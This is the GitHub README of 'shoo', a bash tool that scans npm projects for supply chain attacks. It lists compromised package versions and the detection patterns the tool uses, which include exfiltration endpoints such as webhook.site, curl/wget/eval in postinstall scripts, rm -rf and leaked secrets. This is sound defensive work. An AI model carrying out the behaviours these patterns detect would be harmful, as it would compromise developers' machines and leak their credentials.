Skip to content
/ shoo Public

npm supply chain attack scanner. Detects nx/Singularity, debug/chalk, DuckDB, Shai-Hulud malware, exfiltration endpoints, and suspicious install scripts.

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

jplansink/shoo

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
.github/workflows
.github/workflows
 
 
.gitignore
.gitignore
 
 
.shooignore.example
.shooignore.example
 
 
CHANGELOG.md
CHANGELOG.md
 
 
CONTRIBUTING.md
CONTRIBUTING.md
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
shoo
shoo
 
 

Repository files navigation

Shoo 👻

License: MIT

Fast, offline-first npm supply chain attack scanner. Single bash script, zero dependencies.

Checks your lockfiles, source files, and system for compromised packages, malware, and suspicious patterns.

Why Shoo?

npm supply chain attacks are increasing. Shoo detects, malware files, exfiltration endpoints, and suspicious install scripts.

Attack Packages Impact
nx/Singularity nx@20.9.0-21.8.0 Millions of downloads
debug/chalk debug@4.4.2, chalk@5.6.1 Billions of downloads
DuckDB duckdb@1.3.3, @duckdb/node-api@1.3.3 Data exfiltration
Shai-Hulud Malware files, workflow tampering Targeted orgs
  • Fast — runs in milliseconds, single bash script, zero dependencies
  • Works offline — no network required, fetches updates when available
  • Context-aware — ignores test files and build artifacts, reduces false positives
  • Beyond npm audit — checks VS Code extensions, shell configs, GitHub workflows

Installation

# Download
curl -sO https://raw.githubusercontent.com/jplansink/shoo/main/shoo
chmod +x shoo

# Or clone
git clone https://github.com/jplansink/shoo.git

Requirements

  • Bash 4.0+
  • Optional: curl or wget for online malware database

Example

$ ./shoo

Shoo 👻 .

Total: 2 (critical: 1, high: 1)

CRITICAL
  ✗ Compromised version: nx@21.5.0 (nx/Singularity) [CWE-506]
    package-lock.json
    https://cwe.mitre.org/data/definitions/506.html
    → Remove package, clean reinstall, rotate credentials

HIGH
  ✗ Suspicious postinstall script (curl/wget/eval) [CWE-94]
    node_modules/sketchy-pkg/package.json
    https://cwe.mitre.org/data/definitions/94.html
    → Review script contents before running npm install

Usage

./shoo                # Scan current directory
./shoo ~/projects     # Scan specific directory
./shoo --all          # Scan directory + system
./shoo --system       # Scan system only
./shoo -q             # Quiet (exit code only)
./shoo --json         # JSON output
./shoo --sarif        # SARIF output (GitHub Security)
./shoo --offline      # Skip online databases

Exit codes: 0 clean, 1 critical, 2 high, 3 medium

What It Scans

Location What It Checks
Lockfiles Compromised package versions
Source files Malware patterns, exfiltration endpoints
package.json Suspicious install scripts
GitHub workflows Malicious actions, encoded payloads
VS Code extensions Unicode malware
npm cache Cached malware files
Shell configs Tampering (.bashrc, .zshrc)

Tip

Use --system to scan global packages and VS Code extensions without a project.

What It Detects

Known Attacks

Attack Packages
nx/Singularity nx@20.9.0-21.8.0
debug/chalk debug@4.4.2, chalk@5.6.1 + 16 more
DuckDB duckdb@1.3.3, @duckdb/node-api@1.3.3
Shai-Hulud 2.0 posthog-js, @asyncapi/specs, @ensdomains/ensjs
XRP xrpl@4.2.1-4.2.4, @2.14.2
React Native Aria 16 compromised packages

Plus 1000+ packages from aikido.dev online database (cached 24h).

Suspicious Patterns

Pattern Examples
Malware files setup_bun.js, bun_environment.js
Exfiltration endpoints webhook.site, pastebin.com
Hardcoded secrets AWS keys, GitHub/npm tokens, private keys
Obfuscated payloads Base64 blobs, hex encoding, suspicious minification
Destructive code rm -rf, recursive rmSync
Suspicious postinstall curl/wget/eval in scripts
Unicode obfuscation Hidden homoglyph characters
Malicious workflows Encoded payloads, bad runners
Shell config tampering .bashrc, .zshrc modifications
npm audit CVEs Known vulnerabilities in dependencies
Targeted org typosquatting @asyncapi, @posthog, @zapier

Supported Lockfiles

package-lock.json · yarn.lock · pnpm-lock.yaml

CI/CD

- name: Security scan
  run: |
    curl -sO https://raw.githubusercontent.com/jplansink/shoo/main/shoo
    chmod +x shoo
    ./shoo -q || exit 1

GitHub Security Tab

- name: Security scan (SARIF)
  run: |
    curl -sO https://raw.githubusercontent.com/jplansink/shoo/main/shoo
    chmod +x shoo
    ./shoo --sarif > results.sarif || true
- name: Upload SARIF
  uses: github/codeql-action/upload-sarif@v3
  with:
    sarif_file: results.sarif

Excluding Files

Create .shooignore in your project:

test/fixtures/
malware-samples/

Credits

Contributing

See CONTRIBUTING.md for guidelines on adding new detections.

Changelog

See CHANGELOG.md for version history.

License

MIT

About

npm supply chain attack scanner. Detects nx/Singularity, debug/chalk, DuckDB, Shai-Hulud malware, exfiltration endpoints, and suspicious install scripts.

Topics

npm security supply-chain vulnerability-scanners security-tools npm-security

Resources

Readme

License

MIT license

Contributing

Contributing
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages